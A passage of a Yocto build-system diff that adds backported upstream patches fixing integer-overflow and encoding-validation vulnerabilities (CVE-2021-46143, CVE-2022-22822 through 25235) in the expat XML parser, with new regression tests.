+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+         ;
+       if (parser->m_nsAttsPower < 3)
+         parser->m_nsAttsPower = 3;
+-      nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++      /* Detect and prevent invalid shift */
++      if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++        /* Restore actual size of memory in m_nsAtts */
++        parser->m_nsAttsPower = oldNsAttsPower;
++        return XML_ERROR_NO_MEMORY;
++      }
++
++      nsAttsSize = 1u << parser->m_nsAttsPower;
++
++      /* Detect and prevent integer overflow.
++       * The preprocessor guard addresses the "always false" warning
++       * from -Wtype-limits on platforms where
++       * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++      if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++        /* Restore actual size of memory in m_nsAtts */
++        parser->m_nsAttsPower = oldNsAttsPower;
++        return XML_ERROR_NO_MEMORY;
++      }
++#endif
++
+       temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+                                nsAttsSize * sizeof(NS_ATT));
+       if (! temp) {
diff --git a/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..b1a726d9a8
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
+
+CVE: CVE-2021-46143
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+       if (parser->m_prologState.level >= parser->m_groupSize) {
+         if (parser->m_groupSize) {
+           {
++            /* Detect and prevent integer overflow */
++            if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++              return XML_ERROR_NO_MEMORY;
++            }
++
+             char *const new_connector = (char *)REALLOC(
+                 parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+             if (new_connector == NULL) {
+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+           }
+ 
+           if (dtd->scaffIndex) {
++            /* Detect and prevent integer overflow.
++             * The preprocessor guard addresses the "always false" warning
++             * from -Wtype-limits on platforms where
++             * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++            if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++              return XML_ERROR_NO_MEMORY;
++            }
++#endif
++
+             int *const new_scaff_index = (int *)REALLOC(
+                 parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+             if (new_scaff_index == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
+From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Thu, 30 Dec 2021 22:46:03 +0100
+Subject: [PATCH] lib: Prevent integer overflow at multiple places
+ (CVE-2022-22822 to CVE-2022-22827)
+
+The involved functions are:
+- addBinding (CVE-2022-22822)
+- build_model (CVE-2022-22823)
+- defineAttribute (CVE-2022-22824)
+- lookup (CVE-2022-22825)
+- nextScaffoldPart (CVE-2022-22826)
+- storeAtts (CVE-2022-22827)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
+
+CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 151 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 8f243126..575e73ee 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ 
+   /* get the attributes from the tokenizer */
+   n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
++
++  /* Detect and prevent integer overflow */
++  if (n > INT_MAX - nDefaultAtts) {
++    return XML_ERROR_NO_MEMORY;
++  }
++
+   if (n + nDefaultAtts > parser->m_attsSize) {
+     int oldAttsSize = parser->m_attsSize;
+     ATTRIBUTE *temp;
+ #ifdef XML_ATTR_INFO
+     XML_AttrInfo *temp2;
+ #endif
++
++    /* Detect and prevent integer overflow */
++    if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
++        || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
++      return XML_ERROR_NO_MEMORY;
++    }
++
+     parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
++
++    /* Detect and prevent integer overflow.
++     * The preprocessor guard addresses the "always false" warning
++     * from -Wtype-limits on platforms where
++     * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++    if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
++      parser->m_attsSize = oldAttsSize;
++      return XML_ERROR_NO_MEMORY;
++    }
++#endif
++
+     temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
+                                 parser->m_attsSize * sizeof(ATTRIBUTE));
+     if (temp == NULL) {
+@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+     }
+     parser->m_atts = temp;
+ #ifdef XML_ATTR_INFO
++    /* Detect and prevent integer overflow.
++     * The preprocessor guard addresses the "always false" warning
++     * from -Wtype-limits on platforms where
++     * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#  if UINT_MAX >= SIZE_MAX
++    if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
++      parser->m_attsSize = oldAttsSize;
++      return XML_ERROR_NO_MEMORY;
++    }
++#  endif
++
+     temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
+                                     parser->m_attsSize * sizeof(XML_AttrInfo));
+     if (temp2 == NULL) {
+@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+   tagNamePtr->prefixLen = prefixLen;
+   for (i = 0; localPart[i++];)
+     ; /* i includes null terminator */
++
++  /* Detect and prevent integer overflow */
++  if (binding->uriLen > INT_MAX - prefixLen
++      || i > INT_MAX - (binding->uriLen + prefixLen)) {
++    return XML_ERROR_NO_MEMORY;
++  }
++
+   n = i + binding->uriLen + prefixLen;
+   if (n > binding->uriAlloc) {
+     TAG *p;
++
++    /* Detect and prevent integer overflow */
++    if (n > INT_MAX - EXPAND_SPARE) {
++      return XML_ERROR_NO_MEMORY;
++    }
++    /* Detect and prevent integer overflow.
++     * The preprocessor guard addresses the "always false" warning
++     * from -Wtype-limits on platforms where
++     * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++    if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++      return XML_ERROR_NO_MEMORY;
++    }
++#endif
++
+     uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
+     if (! uri)
+       return XML_ERROR_NO_MEMORY;
+@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+   if (parser->m_freeBindingList) {
+     b = parser->m_freeBindingList;
+     if (len > b->uriAlloc) {
++      /* Detect and prevent integer overflow */
++      if (len > INT_MAX - EXPAND_SPARE) {
++        return XML_ERROR_NO_MEMORY;
++      }
++
++      /* Detect and prevent integer overflow.
++       * The preprocessor guard addresses the "always false" warning
++       * from -Wtype-limits on platforms where
++       * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++      if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++        return XML_ERROR_NO_MEMORY;
++      }
++#endif
++
+       XML_Char *temp = (XML_Char *)REALLOC(
+           parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
+       if (temp == NULL)
+@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+     b = (BINDING *)MALLOC(parser, sizeof(BINDING));
+     if (! b)
+       return XML_ERROR_NO_MEMORY;
++
++    /* Detect and prevent integer overflow */
++    if (len > INT_MAX - EXPAND_SPARE) {
++      return XML_ERROR_NO_MEMORY;
++    }
++    /* Detect and prevent integer overflow.
++     * The preprocessor guard addresses the "always false" warning
++     * from -Wtype-limits on platforms where
++     * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++    if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++      return XML_ERROR_NO_MEMORY;
++    }
++#endif
++
+     b->uri
+         = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
+     if (! b->uri) {
+@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
+       }
+     } else {
+       DEFAULT_ATTRIBUTE *temp;
++
++      /* Detect and prevent integer overflow */
++      if (type->allocDefaultAtts > INT_MAX / 2) {
++        return 0;
++      }
++
+       int count = type->allocDefaultAtts * 2;
++
++      /* Detect and prevent integer overflow.
++       * The preprocessor guard addresses the "always false" warning
++       * from -Wtype-limits on platforms where
++       * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++      if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
++        return 0;
++      }
++#endif
++
+       temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
+                                           (count * sizeof(DEFAULT_ATTRIBUTE)));
+       if (temp == NULL)
+@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
+     /* check for overflow (table is half full) */
+     if (table->used >> (table->power - 1)) {
+       unsigned char newPower = table->power + 1;
++
++      /* Detect and prevent invalid shift */
++      if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
++        return NULL;
++      }
++
+       size_t newSize = (size_t)1 << newPower;
+       unsigned long newMask = (unsigned long)newSize - 1;
++
++      /* Detect and prevent integer overflow */
++      if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
++        return NULL;
++      }
++
+       size_t tsize = newSize * sizeof(NAMED *);
+       NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
+       if (! newV)
+@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
+   if (dtd->scaffCount >= dtd->scaffSize) {
+     CONTENT_SCAFFOLD *temp;
+     if (dtd->scaffold) {
++      /* Detect and prevent integer overflow */
++      if (dtd->scaffSize > UINT_MAX / 2u) {
++        return -1;
++      }
++      /* Detect and prevent integer overflow.
++       * The preprocessor guard addresses the "always false" warning
++       * from -Wtype-limits on platforms where
++       * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++      if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
++        return -1;
++      }
++#endif
++
+       temp = (CONTENT_SCAFFOLD *)REALLOC(
+           parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
+       if (temp == NULL)
+@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
+   XML_Content *ret;
+   XML_Content *cpos;
+   XML_Char *str;
+-  int allocsize = (dtd->scaffCount * sizeof(XML_Content)
+-                   + (dtd->contentStringLen * sizeof(XML_Char)));
++
++  /* Detect and prevent integer overflow.
++   * The preprocessor guard addresses the "always false" warning
++   * from -Wtype-limits on platforms where
++   * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++  if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
++    return NULL;
++  }
++  if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
++    return NULL;
++  }
++#endif
++  if (dtd->scaffCount * sizeof(XML_Content)
++      > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
++    return NULL;
++  }
++
++  const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
++                            + (dtd->contentStringLen * sizeof(XML_Char)));
+ 
+   ret = (XML_Content *)MALLOC(parser, allocsize);
+   if (! ret)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23852.patch b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
new file mode 100644
index 0000000000..41425c108b
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
+From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 22 Jan 2022 17:48:00 +0100
+Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
+ (CVE-2022-23852)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
+
+CVE: CVE-2022-23852
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d54af683..5ce31402 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
+     keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
+     if (keep > XML_CONTEXT_BYTES)
+       keep = XML_CONTEXT_BYTES;
++    /* Detect and prevent integer overflow */
++    if (keep > INT_MAX - neededSize) {
++      parser->m_errorCode = XML_ERROR_NO_MEMORY;
++      return NULL;
++    }
+     neededSize += keep;
+ #endif /* defined XML_CONTEXT_BYTES */
+     if (neededSize
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23990.patch b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
new file mode 100644
index 0000000000..c599517b3e
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
+From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 26 Jan 2022 02:36:43 +0100
+Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
+
+The change from "int nameLen" to "size_t nameLen"
+addresses the overflow on "nameLen++" in code
+"for (; name[nameLen++];)" right above the second
+change in the patch.
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
+
+CVE: CVE-2022-23990
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ lib/xmlparse.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 5ce31402..d1d17005 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+       if (dtd->in_eldecl) {
+         ELEMENT_TYPE *el;
+         const XML_Char *name;
+-        int nameLen;
++        size_t nameLen;
+         const char *nxt
+             = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
+         int myindex = nextScaffoldPart(parser);
+@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+         nameLen = 0;
+         for (; name[nameLen++];)
+           ;
+-        dtd->contentStringLen += nameLen;
++
++        /* Detect and prevent integer overflow */
++        if (nameLen > UINT_MAX - dtd->contentStringLen) {
++          return XML_ERROR_NO_MEMORY;
++        }
++
++        dtd->contentStringLen += (unsigned)nameLen;
+         if (parser->m_elementDeclHandler)
+           handleDefault = XML_FALSE;
+       }
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
+From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 17:37:14 +0100
+Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/562/commits
+
+CVE: CVE-2022-25235
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmltok.c | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/lib/xmltok.c b/lib/xmltok.c
+index a72200e8..3bddf125 100644
+--- a/lib/xmltok.c
++++ b/lib/xmltok.c
+@@ -95,11 +95,6 @@
+         + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)]                 \
+    & (1u << (((byte)[2]) & 0x1F)))
+ 
+-#define UTF8_GET_NAMING(pages, p, n)                                           \
+-  ((n) == 2                                                                    \
+-       ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p))                   \
+-       : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
+-
+ /* Detection of invalid UTF-8 sequences is based on Table 3.1B
+    of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
+    with the additional restriction of not allowing the Unicode
+From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:32:20 +0100
+Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/lib/xmltok_impl.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 0430591b4..64a3b2c15 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -61,7 +61,7 @@
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
+-    if (! IS_NAME_CHAR(enc, ptr, n)) {                                         \
++    if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) {         \
+       *nextTokPtr = ptr;                                                       \
+       return XML_TOK_INVALID;                                                  \
+     }                                                                          \
+@@ -90,7 +90,7 @@
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
+-    if (! IS_NMSTRT_CHAR(enc, ptr, n)) {                                       \
++    if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) {       \
+       *nextTokPtr = ptr;                                                       \
+       return XML_TOK_INVALID;                                                  \
+     }                                                                          \
+@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
+   case BT_LEAD##n:                                                             \
+     if (end - ptr < n)                                                         \
+       return XML_TOK_PARTIAL_CHAR;                                             \
++    if (IS_INVALID_CHAR(enc, ptr, n)) {                                        \
++      *nextTokPtr = ptr;                                                       \
++      return XML_TOK_INVALID;                                                  \
++    }                                                                          \
+     if (IS_NMSTRT_CHAR(enc, ptr, n)) {                                         \
+       ptr += n;                                                                \
+       tok = XML_TOK_NAME;                                                      \
+From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 9 Feb 2022 01:00:38 +0100
+Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
+ already been validated
+
+---
+ expat/lib/xmltok_impl.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 64a3b2c1..84ff35f9 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
+       state = inName;                                                          \
+     }
+ #  define LEAD_CASE(n)                                                         \
+-  case BT_LEAD##n:                                                             \
++  case BT_LEAD##n: /* NOTE: The encoding has already been validated. */        \
+     START_NAME ptr += (n - MINBPC(enc));                                       \
+     break;
+       LEAD_CASE(2)
+@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
+     switch (BYTE_TYPE(enc, ptr)) {
+ #  define LEAD_CASE(n)                                                         \
+   case BT_LEAD##n:                                                             \
+-    ptr += n;                                                                  \
++    ptr += n; /* NOTE: The encoding has already been validated. */             \
+     break;
+       LEAD_CASE(2)
+       LEAD_CASE(3)
+From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:06:21 +0100
+Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 109 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index bc5344b1..9b155b82 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
+ }
+ END_TEST
+ 
++START_TEST(test_utf8_in_start_tags) {
++  struct test_case {
++    bool goodName;
++    bool goodNameStart;
++    const char *tagName;
++  };
++
++  // The idea with the tests below is this:
++  // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
++  // go to isNever and are hence not a concern.
++  //
++  // We start with a character that is a valid name character
++  // (or even name-start character, see XML 1.0r4 spec) and then we flip
++  // single bits at places where (1) the result leaves the UTF-8 encoding space
++  // and (2) we stay in the same n-byte sequence family.
++  //
++  // The flipped bits are highlighted in angle brackets in comments,
++  // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
++  // the most significant bit to 1 to leave UTF-8 encoding space.
++  struct test_case cases[] = {
++      // 1-byte UTF-8: [0xxx xxxx]
++      {true, true, "\x3A"},   // [0011 1010] = ASCII colon ':'
++      {false, false, "\xBA"}, // [<1>011 1010]
++      {true, false, "\x39"},  // [0011 1001] = ASCII nine '9'
++      {false, false, "\xB9"}, // [<1>011 1001]
++
++      // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
++      {true, true, "\xDB\xA5"},   // [1101 1011] [1010 0101] =
++                                  // Arabic small waw U+06E5
++      {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
++      {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
++      {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
++      {true, false, "\xCC\x81"},  // [1100 1100] [1000 0001] =
++                                  // combining char U+0301
++      {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
++      {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
++      {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
++
++      // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
++      {true, true, "\xE0\xA4\x85"},   // [1110 0000] [1010 0100] [1000 0101] =
++                                      // Devanagari Letter A U+0905
++      {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
++      {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
++      {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
++      {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
++      {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
++      {true, false, "\xE0\xA4\x81"},  // [1110 0000] [1010 0100] [1000 0001] =
++                                      // combining char U+0901
++      {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
++      {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
++      {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
++      {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
++      {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
++  };
++  const bool atNameStart[] = {true, false};
++
++  size_t i = 0;
++  char doc[1024];
++  size_t failCount = 0;
++
++  for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++    size_t j = 0;
++    for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
++      const bool expectedSuccess
++          = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
++      sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
++      XML_Parser parser = XML_ParserCreate(NULL);
++
++      const enum XML_Status status
++          = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
++
++      bool success = true;
++      if ((status == XML_STATUS_OK) != expectedSuccess) {
++        success = false;
++      }
++      if ((status == XML_STATUS_ERROR)
++          && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
++        success = false;
++      }
++
++      if (! success) {
++        fprintf(
++            stderr,
++            "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
++            (unsigned)i + 1u, atNameStart[j] ? "    " : "not ",
++            (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
++        failCount++;
++      }
++
++      XML_ParserFree(parser);
++    }
++  }
++
++  if (failCount > 0) {
++    fail("UTF-8 regression detected");
++  }
++}
++END_TEST
++
+ /* Test trailing spaces in elements are accepted */
+ static void XMLCALL
+ record_element_end_handler(void *userData, const XML_Char *name) {
+@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
+ }
+ END_TEST
+ 
++START_TEST(test_bad_doctype_utf8) {
++  const char *text = "<!DOCTYPE \xDB\x25"
++                     "doc><doc/>"; // [1101 1011] [<0>010 0101]
++  expect_failure(text, XML_ERROR_INVALID_TOKEN,
++                 "Invalid UTF-8 in DOCTYPE not faulted");
++}
++END_TEST
++
+ START_TEST(test_bad_doctype_utf16) {
+   const char text[] =
+       /* <!DOCTYPE doc [ \x06f2 ]><doc/>
+@@ -11870,6 +11977,7 @@ make_suite(void) {
+   tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
+   tcase_add_test(tc_basic, test_utf8_in_cdata_section);
+   tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
++  tcase_add_test(tc_basic, test_utf8_in_start_tags);
+   tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
+   tcase_add_test(tc_basic, test_utf16_attribute);
+   tcase_add_test(tc_basic, test_utf16_second_attr);
+@@ -11878,6 +11986,7 @@ make_suite(void) {
+   tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
